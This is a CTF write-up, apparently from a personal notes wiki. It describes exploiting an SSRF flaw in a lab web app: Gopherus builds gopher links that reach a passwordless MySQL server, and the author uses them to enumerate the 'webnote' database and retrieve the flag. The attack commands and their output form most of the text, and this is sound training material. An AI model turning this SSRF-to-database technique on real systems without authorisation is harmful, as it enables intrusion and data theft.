While logged in as admin, we see a **messages** button, clicking that reveals  So `brian` has a **mysql** database that isn't password protected. Neat. The server configuration confirms the existance of a **mysql** server  Thinks we know: 1. brian has a mysql server that doesn't require a password 2. the mysql server is at `10.10.10.53:3306` 3. The server is vulnerable to **SSRF** There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gohper** link for us to use https://github.com/tarunkant/Gopherus `gopherus --exploit mysql`  adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (10.10.10.53), we get back ``` Log: Resp: shipmentID,arrival_date,catalogURL Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA invalid format! Cannot import records! ``` More base64  Looks like there's a database called `webnote`. Using **gopherus** to issue these commands, we can enumerate the database 1. `show databases;` - reveals the database `webnote` 2. `use webnote; show tables;` - reveals the table `settings` 3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';` - reveals the columns `apikey` and `note` 4. `use webnote; select note from settings;` - gives the flag  `flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #ssrf #mysql #sql Related: